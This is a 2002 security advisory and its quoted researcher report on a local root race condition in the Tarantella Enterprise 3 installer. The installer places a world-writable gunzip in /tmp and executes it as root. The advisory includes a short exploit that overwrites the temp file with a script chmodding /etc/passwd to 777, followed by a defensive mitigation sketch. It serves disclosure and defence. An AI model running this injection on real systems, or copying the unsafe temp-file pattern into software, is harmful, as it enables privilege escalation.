SecurityTracker.com
Category:   Application (Web Server/CGI)  >   Tarantella
Vendors:   Tarantella, Inc.
Tarantella Enterprise Application Server Uses Unsafe Temporary Files During Installation, Allowing Local Users to Obtain Root Privileges on the System
SecurityTracker Alert ID:  1003373
SecurityTracker URL:  http://securitytracker.com/id/1003373
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jan 26 2002
Impact:   Execution of arbitrary code via local system, Root access via local system
Exploit Included:  Yes  
Version(s): 3
Description:   An installation vulnerability has been reported in Tarantella Enterprise 3. A local user can obtain root access to the system during installation.

Vapid Labs reported that the Tarantella installation script handles certain utility packages in an unsafe manner during installation. A root owned file compression utility "gunzip" is apparently created in the /tmp directory with world writeable permissions. The filename is appended with the process ID (e.g., /tmp/gunzip16152). A local user can inject malicious code into this temporary file after the file is created but before it is executed by the Tarantella installation script. Then, when the file is executed by the script, the malicious code will be executed with root level permissions.

A demonstration exploit script is provided:

$ echo "#!/bin/sh" > /tmp/test.sh
$ echo "chmod 777 /etc/passwd" >> /tmp/test.sh

$ cat /tmp/test.sh > /tmp/gunzip16152

Impact:   A local user can execute arbitrary code on the server with root privileges while the software is being installed.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.tarantella.com/products/e3/
Cause:   Access control error
Underlying OS:  Linux (Any), UNIX (AIX), UNIX (HP/UX), UNIX (Open UNIX-SCO), UNIX (Solaris - SunOS), UNIX (Tru64)
Underlying OS Comments:  Tested on Linux Debian 2.2

Message History:   None.


 Source Message Contents

Subject:  [VulnWatch] Vulnerability report for Tarantella Enterprise 3.



				Vapid Labs
			     Larry W. Cashdollar
			        1/14/2002

Vulnerability report for Tarantella Enterprise 3.

1. local root compromise during installation:

	The installation script provided with Tarantella handles utility
packages during installation insecurely.   A root owned binary "gunzip"
is created in /tmp with world writeable permissions, the pid is appended
to the filename.


TMP_GUNZIP=$TMPDIR/gunzip$$

$ ls -l /tmp/gunzip16152
-rwxrwxrwx    1 root     root        51808 Jan 14 00:15 gunzip16152

gunzip is extracted:
		    extract gunzip > "$TMP_GUNZIP" 2>>$SHXLOGFILE
		    extract gunzip | uncompress > "$TMP_GUNZIP" 2>>$SHXLOGFILE

The permissions of gunzip are changed to rwx for all:
	    chmod 777 $TMP_GUNZIP >/dev/null 2>&1
The binary is used during installation:
	    extract $efilename | $TMP_GUNZIP -q > "$efilename"

2. Exploit:

There is a race condition between when gunzip is extracted and used during
installation, at which time a malicious local user could inject code to
compromise the system quickly.

$ echo "#!/bin/sh" > /tmp/test.sh
$ echo "chmod 777 /etc/passwd" >> /tmp/test.sh

$ cat /tmp/test.sh > /tmp/gunzip16152

I was able to change the permissions of /etc/passwd to 777 by performing the
above as an unprivileged user.

3. Recommendations:

Perhaps create a directory in /tmp or /var/tmp and use that directory as a
work place?

umask 077
mkdir /tmp/workdir

4. Software: Tarantella Enterprise 3

http://www.tarantella.com/download/e3/

Tested on Linux Debian 2.2
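A sketch of the recommendation in section 3 of the report, added here as an example and not taken from the Tarantella installer or from the original message: the helper is staged inside a private work directory instead of being written to /tmp and made mode 777, and it is checked again just before it would be run. The function names are hypothetical, and the staged script is a constructed stand-in for the extracted gunzip binary.

```shell
#!/bin/sh
# Added example, not from the Tarantella installer. Function names are
# hypothetical; the staged file is a constructed stand-in for gunzip.

# Create a fresh 0700 directory. mktemp -d fails rather than reuse an
# existing name, so a pre-planted directory or symlink is never adopted.
make_workdir() {
    ( umask 077 && mktemp -d "${TMPDIR:-/tmp}/install.XXXXXXXXXX" )
}

# Write stdin to $1/$2 as 0700. noclobber (set -C) makes the redirect
# fail if the name already exists instead of writing into it.
stage_helper() {
    ( umask 077 && set -C && cat > "$1/$2" && chmod 700 "$1/$2" )
}

# True if $1 is of type $2 (f or d), owned by us, and not writable by
# group or other. find does not follow a symlink named on the command line.
is_private() {
    [ -n "$(find "$1" -prune -type "$2" -user "$(id -u)" \
            ! -perm -020 ! -perm -002 2>/dev/null)" ]
}

# Check to run immediately before executing the helper as root.
is_safe_helper() {
    is_private "$1" f && is_private "$(dirname "$1")" d
}

# Demo: stage a helper, then apply the installer's original mode to it.
work=$(make_workdir) || exit 1
trap 'rm -rf "$work"' EXIT
printf '#!/bin/sh\nexit 0\n' | stage_helper "$work" gunzip
is_safe_helper "$work/gunzip" && echo "ok: helper is private"
chmod 777 "$work/gunzip"   # the mode the installer applied
is_safe_helper "$work/gunzip" || echo "refused: helper is world-writable"
```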




 
 

